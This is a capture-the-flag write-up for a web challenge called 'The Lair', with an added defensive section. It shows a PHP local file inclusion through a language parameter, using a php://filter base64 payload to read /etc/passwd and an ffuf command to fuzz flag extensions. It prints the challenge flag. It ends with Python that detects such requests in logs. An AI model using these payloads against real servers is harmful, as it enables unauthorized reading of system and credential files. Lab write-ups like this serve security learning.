Acaard

The Lair (web)

The Lair web challenge solution.


Last updated 7 months ago

Let's start by visiting the web page:

We see a simple page with some text. Other languages are available, and when we select one of them the URL changes to:

http://127.0.0.1:8080/?lang=de.php

Some additional text is also shown on the page, which hints at an LFI. The challenge description told us that "the flag isn't .txt", which means we need to fuzz for extensions and find a way to read any file (because some file types won't show in the browser).

Let's test a PHP filter that encodes to base64 to read files:

According to HackTricks, we can use the following payload in an LFI to encode the output of files:

php://filter/read=convert.base64-encode/resource=/etc/passwd

In the request URL:
http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/etc/passwd

Testing it on /etc/passwd to see if it's applicable here, we see Base64 data on the webpage, and decoding it in CyberChef gives us the contents of the file.

Now we can use ffuf to check whether any /flag.EXTENSION file can be read.

ffuf -u 'http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/flagFUZZ' -w raft-large-extensions-lowercase.txt

After running that command we see a lot of output, because every request returns 200 even when no file is read. So we add a size filter, -fs 3979 (the size shown for those responses), and then we get:

.php                    [Status: 200, Size: 4043, Words: 1553, Lines: 152, Duration: 1ms]

.php is a valid hit. Reading it and decoding the output in CyberChef gives us:

<?php

tuxCTF{F!lTer$?_but_I_THOU6Ht_BlooD}

?>

Done! Happy Hacking :)
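From the defender's side, the requests made in this writeup stand out in web server logs. The following is an added example, not part of the original writeup or the challenge's code: it flags `lang` values that are stream wrappers or file paths. The log lines, the two-letter `xx.php` pattern and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Shape the application legitimately uses, assumed from ?lang=de.php.
EXPECTED = re.compile(r"[a-z]{2}\.php")
# PHP stream wrappers; none belongs in a language selector.
WRAPPER = re.compile(r"(php|data|expect|zip|phar|file|glob|https?|ftp)://", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines in common log format (not from the challenge server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /?lang=de.php HTTP/1.1" 200 4100',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /?lang=php://filter/read='
    'convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 5300',
    '203.0.113.9 - - [01/Jan/2025:10:00:06 +0000] "GET /?lang=php%3A%2F%2Ffilter/read='
    'convert.base64-encode/resource=/flag.php HTTP/1.1" 200 4043',
    '203.0.113.9 - - [01/Jan/2025:10:00:07 +0000] "GET /?lang=/etc/passwd HTTP/1.1" 200 4200',
]

def classify_lang(value):
    """Return (reason, decoded); reason is None when the value looks legitimate."""
    for _ in range(3):  # normalise nested percent-encoding before matching
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if EXPECTED.fullmatch(value):
        return None, value
    if WRAPPER.match(value):
        return "stream wrapper", value
    if value.startswith("/") or ".." in value:
        return "path outside language directory", value
    return "unexpected value", value

def scan(lines):
    """Return (client, reason, decoded lang value) for each suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        query = match.group(1).partition("?")[2]
        for raw in parse_qs(query).get("lang", []):
            reason, decoded = classify_lang(raw)
            if reason:
                findings.append((line.split()[0], reason, decoded))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same `EXPECTED` pattern, applied in the application as an allowlist before the include, is what closes the hole; the log check only surfaces attempts.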

Figures: Showing homepage; LFI POC